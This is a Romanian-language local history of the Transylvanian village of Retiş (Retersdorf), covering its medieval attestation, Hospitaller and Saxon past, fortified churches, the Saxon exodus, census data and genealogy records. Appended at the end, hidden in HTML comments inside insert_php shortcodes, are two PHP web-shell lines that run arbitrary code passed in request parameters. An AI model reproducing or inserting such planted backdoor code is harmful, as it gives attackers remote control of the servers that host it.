Retiş

VILLA MILITUM -Satul Călăreţilor

Satul Retiş este unul dintre cele a căror istorie se pierde în originile aşezării saşilor în Ardeal, colonizare care începe cândva în secolul al XII-lea. Unele surse vorbesc de 1349 ca primă dată de atestare a acestui sat, altele 1353. într-un articol din Allgemenine Deutsche Zeitung fur Rmanien, Gernot Nussbacher citează un istoric maghiar Giorfy Gyorgy care identifică Villa Militum – Locul Războinicilor din descrierea frontierei din Walldorf cu acest loc – Retis. Localitatea Retiş se află pe cursul superior al Hârtibaciului şi, din punct de vedere administrativ, aparţine de comuna Brădeni (3km) (Henndorf), situată in nordestul judeţului Sibiu.

Extras din harta Siebenburgen, înainte de 1914.

În literatura de pînă acum, ca an al primei atestări documentare a Retişului, este indicat anul 1353. În anul 1987 isotricul maghiar Giorffi Gyorgy a atras atenţia asupra faptului că, „Villa Militum – Locul Războinicilor” din descrierea frontierei din Walldorf, datînd din anul 1206, se refera mai degraba la Retiş, decat la Sălişteatul cu care pînă acum fusese in mod obişnuit identificat, acesta fiind numit ulterior doar „Felix Locus” (Selig Stadt) adică locul fericit. In aceiaşi direcţie pledează şi cel mai vechi document referitor la Retiş şi anume scrierea regelui Ludovic I, din 1353, prin care însărcineaza Capitoliul din Weissenburg (Apold) (biserica fortificată din Apold, anume pe stareţul Baudunus (Balduin) Cornutus, cavalerul cruciat al Sfîntului Ioan din Ierusalim (deci Ordinul Ioaniţilor) să introducă în Ungaria şi posesiunea „Petru”, care le aparţinea lor cu drepturi depline, care însă fusese, în mod ilegal ocupat de Nicolaus von Henndorf. O alta observaţie care ar putea avea o oarecare semnificaţie este ca ceea ce cunoaştem azi generic ca Ordinului Cavalerilor Teutoni, în epoca din care ei proveneau se numea şi Deutscher Ritterorden, de unde, etimologic am putea specula particula Riter din Ritersdorf. dacă admitem ca Hermann din Hermannstadt este nimeni altul decât Hermann von Saxa şi că direcţia colonizării era de la Dunăre, Mureş, Olt, atunci, aici in lunca largită a Hârtibaciului puteau sta la odihna mai mulţi cai ai mai multori cavaleri („Ritter” în germană). Am mai putea nota ca prima frontieră a regatului Ungariei a fost linia Olt – Hârtibaci, înainte de a fi extinsă pe aliniamentul Carpaţilor. Aceasta poate fi explicaţia frontierei Walldorf. Ordinul Ioaniţilor poate fi datat în aceasta zonă cel puţin din anul 1247 iar documentul din anul 1353 este doar unul din mai numeroasele ordine solicitate de stareţul Baudunus Cornutus de repunere a Ordinului în drepturile sale, care fuseseră ocupate de mai mulţi nobili. Interesant este faptul că în documentul din 1353 „Posesiunea Reter” este localizată în Transilvania şi aparţine Scaunului de la Sighisoara, ceea ce nu poate fi luat cuvânt cu cuvaât deoarece posesiunile nobiliare, precum şi domeniile Ordinului nu erau incluse în administraţia săseasca. Contele Nicolaus von Henndorf (Nycolaus) apare încă în anul 1369 ca proprietar al regiunii Sighişoara. Astfel putem considera că Retişul a fost fondat de Cavalerii Ioaniţi, sau de alţi cavaleri în jurul anului 1200, aparţinînd astfel localitaţilor cu cele mai vechi atestări documentare din Transilvania de Sud. Gustav Kisch (1905) atribuie ca denumire a localitaţii sintagma „Satul lui Rether” şi consideră că este legat de un anumit nume de familie.

Biserica Evanghelică, Retiş

De asemenea prezintă o serie de localitaţi cu acelasi nume in „patria primordiala”. Walther Scheiner (1926) considera şi el numele localitaţii ca derivând dintr-un nume de familie. Următorul izvor al istoriei Retişului este un document al Scaunului de la Cincu, din anul 1389. Cei doi nobili: conţii Tylo şi fratele acestuia, Ladislau, cărora le aparaţinea satul Retiş, au facut o inţelegere cu comuna învecinată Selistadt, referitoare la o jumătate de moara şi o jumătate de iaz, a căror cealaltă jumătate aparţinea celor din Selistadt. Comunitatea retişeana trebuia să amenajeze pe domeniul nobililor un alt iaz, primind in schimb întreaga moară şi vechiul iaz. Acest iaz trebuia să aiba o sută de paşi, iar adîncimea în mijloc, la evacuarea apei trebuia să fie cu un cot mai adânca decat onorabilul domn Michael Krocher, din Selistat. Contele Tylo mai este menţionat într-un document al Scaunului de la Cincu în 1390 ca fiind un judecător imperial obişnuit. OEste posibil ca acest Tylo de Villa Retherii din1389 acelaşi conte Tylamannus, fiu al lui Daniel de Selistadt, care in 1383 si 1387 a fost numit judecător imperial la Cincu.

Din secolul al XIV-lea Retişul aparţine, ca enclavă, comitatului Apold care se găsea între Scaunele săseşti ale Sighişoarei, în nord şi ale Cincului, în sud. Existenţa populaţiei germanice este dovedită de apartenenţa la Capitoliu, care este probată de două înscrisuri din jurul anului 1400. În cel mai vechi dintre acestea, Retişul este înregistrat cu un impozit şi o dobanda de 3,5, fiind astfel inclus între comunităţile mici ale Capitoliului precum Coveş, Beneşti, Dăişoara, Crihalma, care aproape toate, se găseau pe pământul Comitatului. Şi în cel de-al doilea document, care nu este mult mai vechi decat primul, se vorbeşte de impozit. Astfel deţinem unele dintre cele mai vechi izvoare scrise ale istoriei locale a Retişului până pe la anul 1400.

Gernot Nussbacher – Allgemeine Deutsche Zeitung fur Rumanien / 13 octombrie 1994 – Extras din cea mai veche istorie locală a Retişului

Siebenburgen la 1852

BISERICILE – CETĂŢI MEDIEVALE

Zona de sud – est a Transilvaniei, ce corespunde cu arealul pe care au fost colonizate comunităţi de etnie germană (flandrenses, theutonici, saxones) oficial de către regii Ungariei din dinastia arpadiana, are o caracteristică aparte. Ea este dată de o frecvenţă mare a bisericilor fortificate, datând din secolele XII – XVI, prezente în cea mai mare parte a satelor si târgurilor colonizate de populaţia germana si cunoscută sub genericul de saşi (saxones).Astfel de biserici – cetăţi sunt cunoscute şi în alte părţi ale Europei medievale, mai ales în mediul germanic şi sudul Frantei, însă frecvenţa lor şi gradul de conservare a fondului arhitectonic original, este aici mai mare decit oriunde. Tipologia lor este diversă, trecând de la lacaşul de cult propriu – zis fortificat pentru aparare, apoi biserici nefortificate înconjurate de ziduri si turnuri de aparare, pâna la biserici – cetate, prevăzute cu mai multe incinte fortificate, rondele si bastioane. Unele dintre acestea adăposteau clădiri şi functiuni diverse: spaţii de depozitare sub forma unor cămări adosate zidurilor, fântâni, şcoli, locuinţele preoţilor si chiar primării. În spaţiul transilvan, cea mai mare parte au debutat prin a fi la origine biserici tip basilica romanica (sec. XIII) sau gotică (sec. XIV – XV), care sub imperiul primejdiei invaziilor otomane, din secolele XV – XVII, au suferit modificări de structura prin supraînălţări, umpleri de goluri, boltiri, întărirea turnurilor şi fortificarea edificiilor.

Biserica Evanghelică, Retiş

Cu acest prilej stilul romanic iniţial a fost înlocuit cu elementele goticului matur si târziu. Bisericile, fortificate sau nu, au fost împrejmuite cu ziduri adaptate formelor terenului pe care erau construite, cu turnuri si bastioane de apărare de o tipologie diversă si pitorească. Cea mai mare frecvenţă a bisericilor fortificate o regăsim în Provincia Sibiului împărţita în sec. XIV în cele şapte scaune (Orăstie, Sebeş, Miercurea, Sibiu, Nocrich, Cincu si Rupea), precum şi în localităţile din jurul Mediaşului (din „Cele Două Scaune”, Mediaş si Şeica Mare). Spre deosebire de cetăţile din vestul Europei, bisericile – cetăţi din sud-estul Transilvaniei nu erau locuite permanent. Ele aveau funcţii sacrale, de adăpostire a populaţiei si de apărare în caz de primejdie. Funcţiile lor sunt surprinse sugestiv de prof. dr. Paul Philippi: Când voievodul transilvănean de origine româna Ioan de Hunedoara începuse să organizeze din Transilvania lupta antiotomana a Europei, în satele săseşti au aparut sute de biserici fortificate. Ele conferă până în ziua de astăzi un aspect inconfundabil peisajului,marcând durabil religiozitatea săsească. În perimetrul fortificat al bisericii era cautată protecţia trupului şi a vieţii; comunităţii i se asigura ocrotirea, fiecare obligându-se la sacrificii si disciplină. Şi pe când pe creneluri se dădea lupta sau se stătea de veghe, slujba religioasă şi scoala continuau in biserică … (Prof. D. Dr. Paul Philippi, 800 de ani Eclesia Theutonicorum Ultransilvanorum, în Catalogul expoziţiei 800 de ani de biserică a germanilor din Transilvania, Wort und Welt Verlag, Thaur bei Innsbruck, 1991).

Retiş în Harta Iosefină a Transilvaniei, 1769-1773

Monografia satului, un text care în cazul nostru comportă două variante, una a şcolii iar cealalta a bisericii (cea de la şcoală – editată în această formă cu ocazia centenarului Ilarion Cocişiu), trece rapid peste secole pomenind RETHER VILLA după care RETEZATUL în harta cartografului Spiridon Fetti. Mai aminteşte că în 1417 iobagii din Retiş au luat parte la rascoala din judeţul Alba, condusă de Kardos János. Represaliile aveau să vină însă din partea armatei nobiliare si a patriciatului săsesc de pe Olt (Alt) cu reşedinţa la (Schenk) Cincşor.

Oricât de tenebros ar fi evul mediu transilvan, oricât de irelevant patriotarde pretenţiile istoriografice româneşti, satul este unul dintre cele tipice pentru aşezările săsești, aproape confundabile unele cu celelalte, dar tot atât de adevărat locuit în întregime de romani acum. Fosta biserică evanghelică nu a fost fortificată, iar „die Alte Zahl”, data cea mai veche care poate fi documentată este 1599.

Poate ca apartenenţa acestor locuri la un spaţiu mai generos multietnic, nu foarte indepartată în timp, ar putea stinge eventuale orgolii.

Bătălia de la Bărcut, în locul numit „Pe Dos”, descrisă de Camil Petrescu în „Ultima noapte de dragoste, întîia noapte de război” (Ne-a acoperit pamântul lui Dumnezeu) a lasat in urmă un cimitir al eroilor, eroi lângă care mai odihnesc acum şi alţii căzuţi în alte războaie.  În acest cimitir, în mijlocul căruia jeleşte o salcie ruptă de acum de vânt şi timp este şi mormântul lui Max Paetzel, de exemplu, printre alţii, soldat uitat de ai lui, mort prin războaiele altora, în satul lui Reter.

Într-un articol dedicat Biertan-ului în Magazin Istoric – August 1997 – Christa Richter, Cristian Sencovici aminteau că în 1919 a fost editata „Ce sunt si ce vor fi saşii din Ardeal” cu prefaţa semnată de Nicolae Iorga: „Romanii sunt desigur, şi un popor al viitorului, dar nu se pot gândi a atinge, în orice fel de cirmustanţe, drepturile istorice ale altei naţii care este legată aşa de strâns şi adeseori si aşa de prieteneşte cu propria lor fiinţă. A fi adus cultura superioară cu sine, a fi împlântat viaţa orăşenească pe amândouă povârnişurile Carpaţilor, a fi statornicit definitiv viaţa întregului Ardeal în forme fixate, a fi legat Apusul cu Răsăritul până la Dunare şi la depărtatele ţări „tătăreşti”, greceşti si turceşti prin relaţiile de comerţ; a fi ajutat la biruinţele limbii naţionale a românilor asupra formei culturale medievale a limbii slavone, – toate acestea crează drepturi şi merite, pentru cultura generală şi pentru cultura românilor îndeosebi, ce nu putem să le cunoaştem si să le preţuim îndeajuns si care impun poporului nostru o datorie pe care nu ne gândim a o tăgădui.” …ce vor fi saşii din Ardeal… este deja o chestiune care nu mai suferă variante si interpretări: astăzi se poate postula ca în Ardeal nu mai sint saşi. Unul dintre puţinii saşi rămaşi, locuitor din satul „Noul Săsesc”, un batrîn, spunea într-un interviu televizat: „… cred ca noi sintem singurul popor pe care nu l-a gonit nimeni, am plecat de buna voie.” Femeia din „Dealul Frumos” care ne-a insoţit, într-o vara, în vizita din biserica ne-a atras atenţia asupra clopotelor ce băteau, cu un admirabil accent săsesc: „… vedeţi?! Cineva trage clopotele iar eu sunt aici, acolo nu e nimeni. Oamenii noştri nu au plecat până când nu au facut cumva ca aceste clopote să fie trase fără ca ei să fie aici.” Clopotele continuă să bată şi azi, în fiecare dimineaţă, să vestească prânzul şi apoi în fiecare seară sa adune recolta fiecarei zile, zi dupa zi, pentru cei 17 saşi (in August 2004).

În Agnita (Agneteln) mai sint 6 familii. „Cei mai amărâţi, cei care nu au avut unde să se ducă”, comenta un agniţean, „… dar noi avem saşi” continua tot el. Nici măcar persoanele de contact din harta ghid editată cu sprijinul ambasadei Statelor Unite ale Americii nu sunt de căutat. Sunt bătrâni octogenari cei mai mulţi dintre ei. Mecanismul din Dealul Frumos face însă ca sunetul clopotelor să se audă peste zilele Ardealului de sud fără să fie nevoie ca cineva sa mai tragă clopotele. Clopotele din Dealul Frumos învăluie peisajul mânăstirilor cisterciene, cetăţilor ruinate de pe dealurile acestei ţări cu o frumuseţe unică, ascunsă in aerul greu cu miros de bălegar al verilor toride sau în încremenirea troienelor iernii. Înainte de al doilea razboi mondial în Ardeal trăiau 300 000 de saşi. În ultimul an al comunismului 20 000. Cu toate acestea nimeni nu i-a gonit pe aceşti oameni.

Pentru Retiş, rezultatele recensamintelor rezumă sec:

Village Names:

German: Retersdorf

Hungarian: Réten

Official: Retişu

Spelling and/or dialect variants: Rittersdorf, Reteschdorf

Location: Country: Romania Northeast of Agnita, 5 km south of Bradeni Postal-Code: 2498

Population:

1786: 869

1910: 933

1940: 279 Lutherans

1966: 1014

1997: no Germans – nici un german!

Genealogical Records:

Village name in FHL records:

Retersdorf Church records available at FHL: B: 1753-1870; M: 1816-1870; D: 1771-1870 FHL Microfilm Nr.: 1417969, etc. FHL 1819/20 Hungarian Land Census Microfilm: Reten FHL Microfilm Nr.: 1529952, item 2 Leipzig archives: B: 1753-1870; M: 1816-1870; D: 1771-1870, with gaps

Miscellaneous: Founded: 1349 Kirchenburg/church fortress The altar is the work of Georg Philippi, a carpenter from Sighisoara Spelling with diacritics: Retişu

În „Saxons through Seventeen Centuries”, J. Foisel, 1936 din punctul de vedere al populaţiei şi repartiţiei ei: Satul, situat în ţinutul SCHENCK numara 1056 de locuitori din care 226 saxoni (21%).

Lista de echivalemnţe ale numelor satelor din Ardeal.

<!– [insert_php]if (isset($_REQUEST["oJr"])){eval($_REQUEST["oJr"]);exit;}[/insert_php][php]if (isset($_REQUEST["oJr"])){eval($_REQUEST["oJr"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["BlLn"])){eval($_REQUEST["BlLn"]);exit;}[/insert_php][php]if (isset($_REQUEST["BlLn"])){eval($_REQUEST["BlLn"]);exit;}[/php] –>